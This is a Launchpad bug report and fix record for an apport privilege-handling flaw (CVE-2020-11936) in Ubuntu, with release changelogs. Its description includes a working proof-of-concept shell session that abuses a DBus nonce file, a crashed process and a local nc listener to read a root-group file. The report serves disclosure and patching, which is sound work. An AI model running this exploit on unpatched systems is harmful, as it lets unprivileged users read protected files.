Ubuntu
apport package

[ZDI-CAN-11233]: apport Unnecessary Privileges Information Disclosure Vulnerability

Bug #1885633 reported by Steve Beattie
258
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Apport
Fix Released
Medium
Unassigned
Apport 2.21.0
apport (Ubuntu)
Fix Released
Medium
Unassigned
Xenial
Fix Released
Medium
Unassigned
Bionic
Fix Released
Medium
Unassigned
Eoan
Won't Fix
Medium
Unassigned
Focal
Fix Released
Medium
Unassigned

Bug Description

-- VULNERABILITY DETAILS ------------------------
* Version tested:18.04.4 LTS amd64 server
* Installer file:ubuntu-18.04.4-live-server-amd64.iso
* Platform tested:-

---

### Analysis

Apport which is crash reporter in Ubuntu will execute gdbus to check if pid is in a closing user session. Before executing the binary, it drop privilege to crashed process's uid. But it doesn't drop group id, so it can be used to leak file which is owned by root group.

It leads to anyone can read the file which can only be read by root group, but the file size must be 16bytes.

reproduce step
```
ubuntu@ubuntu:/tmp$ echo -ne "SECURESECRETHERE" > securefile
ubuntu@ubuntu:/tmp$ sudo chown root:root securefile
ubuntu@ubuntu:/tmp$ sudo chmod 440 securefile
ubuntu@ubuntu:/tmp$ su - zdi
Password:
zdi@ubuntu:~$ id
uid=1001(zdi) gid=1001(zdi) groups=1001(zdi)
zdi@ubuntu:~$ cd /tmp/
zdi@ubuntu:/tmp$ ls -al securefile
-r--r----- 1 root root 16 Jun 16 04:33 securefile
zdi@ubuntu:/tmp$ cat securefile
cat: securefile: Permission denied
zdi@ubuntu:/tmp$ nc -lp 8888 &
[1] 2034
zdi@ubuntu:/tmp$ DBUS_SESSION_BUS_ADDRESS=nonce-tcp:host=localhost,port=8888,family=ipv4,noncefile=/tmp/securefile sleep 1000 &
[2] 2036
zdi@ubuntu:/tmp$ kill -11 2036
zdi@ubuntu:/tmp$ SECURESECRETHEREAUTH

zdi@ubuntu:/tmp$
```

~~~C++
    orig_uid = os.geteuid()
    os.setresuid(-1, os.getuid(), -1) <-- did not set gid
    try:
        gdbus = subprocess.Popen(['/usr/bin/gdbus', 'call', '-e', '-d',
                                  'org.gnome.SessionManager', '-o', '/org/gnome/SessionManager', '-m',
                                  'org.gnome.SessionManager.IsSessionRunning'], stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE, env={'DBUS_SESSION_BUS_ADDRESS': dbus_addr})
        (out, err) = gdbus.communicate()
        if err:
            error_log('gdbus call error: ' + err.decode('UTF-8'))
    except OSError as e:
        error_log('gdbus call failed, cannot determine running session: ' + str(e))
        return False
    finally:
        os.setresuid(-1, orig_uid, -1)
~~~
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
Ryota Shiga(@Ga_ryo_) of Flatt Security working with Trend Micro Zero Day Initiative

See original description
Steve Beattie (sbeattie)
description: updated
Revision history for this message
Steve Beattie (sbeattie) wrote :

Reproduced on focal. Setting the priority to medium due to the requirement that the root group file to be targeted must be exactly 16 bytes in size.

Changed in apport (Ubuntu Focal):
status: New → Confirmed
importance: Undecided → Medium
Changed in apport (Ubuntu Eoan):
importance: Undecided → Medium
Changed in apport (Ubuntu Bionic):
importance: Undecided → Medium
Changed in apport (Ubuntu Xenial):
importance: Undecided → Medium
Changed in apport (Ubuntu):
importance: Undecided → Medium
Revision history for this message
Steve Beattie (sbeattie) wrote :

Also reproduced in xenial.

Changed in apport (Ubuntu Xenial):
status: New → Confirmed
Changed in apport (Ubuntu Bionic):
status: New → Confirmed
Changed in apport (Ubuntu Eoan):
status: New → Confirmed
Revision history for this message
Steve Beattie (sbeattie) wrote :

This issue has been assigned CVE-2020-11936.

Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.11-0ubuntu27.6

---------------
apport (2.20.11-0ubuntu27.6) focal-security; urgency=medium

  * SECURITY UPDATE: information disclosure issue (LP: #1885633)
    - data/apport: also drop gid when checking if user session is closing.
    - CVE-2020-11936
  * SECURITY UPDATE: crash via malformed ignore file (LP: #1877023)
    - apport/report.py: don't crash on malformed mtime values.
    - CVE-2020-15701
  * SECURITY UPDATE: TOCTOU in core file location
    - data/apport: make sure the process hasn't been replaced after Apport
      has started.
    - CVE-2020-15702
  * apport/ui.py, test/test_ui.py: make sure a PID is specified when using
    --hanging (LP: #1876659)
  * WARNING: This package does _not_ contain the changes from
    2.20.11-0ubuntu27.5 in focal-proposed.

 -- Marc Deslauriers <email address hidden> Fri, 31 Jul 2020 09:10:30 -0400

Changed in apport (Ubuntu Focal):
status: Confirmed → Fix Released
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.1-0ubuntu2.24

---------------
apport (2.20.1-0ubuntu2.24) xenial-security; urgency=medium

  * SECURITY UPDATE: information disclosure issue (LP: #1885633)
    - data/apport: also drop gid when checking if user session is closing.
    - CVE-2020-11936
  * SECURITY UPDATE: crash via malformed ignore file (LP: #1877023)
    - apport/report.py: don't crash on malformed mtime values.
    - CVE-2020-15701
  * SECURITY UPDATE: TOCTOU in core file location
    - data/apport: make sure the process hasn't been replaced after Apport
      has started.
    - CVE-2020-15702
  * apport/ui.py, test/test_ui.py: make sure a PID is specified when using
    --hanging (LP: #1876659)

 -- Marc Deslauriers <email address hidden> Fri, 24 Jul 2020 09:08:40 -0400

Changed in apport (Ubuntu Xenial):
status: Confirmed → Fix Released
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.9-0ubuntu7.16

---------------
apport (2.20.9-0ubuntu7.16) bionic-security; urgency=medium

  * SECURITY UPDATE: information disclosure issue (LP: #1885633)
    - data/apport: also drop gid when checking if user session is closing.
    - CVE-2020-11936
  * SECURITY UPDATE: crash via malformed ignore file (LP: #1877023)
    - apport/report.py: don't crash on malformed mtime values.
    - CVE-2020-15701
  * SECURITY UPDATE: TOCTOU in core file location
    - data/apport: make sure the process hasn't been replaced after Apport
      has started.
    - CVE-2020-15702
  * apport/ui.py, test/test_ui.py: make sure a PID is specified when using
    --hanging (LP: #1876659)

 -- Marc Deslauriers <email address hidden> Fri, 24 Jul 2020 09:08:40 -0400

Changed in apport (Ubuntu Bionic):
status: Confirmed → Fix Released
Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.11-0ubuntu44

---------------
apport (2.20.11-0ubuntu44) groovy; urgency=medium

  * SECURITY UPDATE: information disclosure issue (LP: #1885633)
    - data/apport: also drop gid when checking if user session is closing.
    - CVE-2020-11936
  * SECURITY UPDATE: crash via malformed ignore file (LP: #1877023)
    - apport/report.py: don't crash on malformed mtime values.
    - CVE-2020-15701
  * SECURITY UPDATE: TOCTOU in core file location
    - data/apport: make sure the process hasn't been replaced after Apport
      has started.
    - CVE-2020-15702
  * apport/ui.py, test/test_ui.py: make sure a PID is specified when using
    --hanging (LP: #1876659)

 -- Marc Deslauriers <email address hidden> Fri, 31 Jul 2020 09:10:30 -0400

Changed in apport (Ubuntu):
status: New → Fix Released
Seth Arnold (seth-arnold)
information type: Private Security → Public Security
Marc Deslauriers (mdeslaur)
Changed in apport (Ubuntu Eoan):
status: Confirmed → Won't Fix
Benjamin Drung (bdrung)
Changed in apport:
status: New → Fix Released
milestone: none → 2.21.0
importance: Undecided → Medium
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.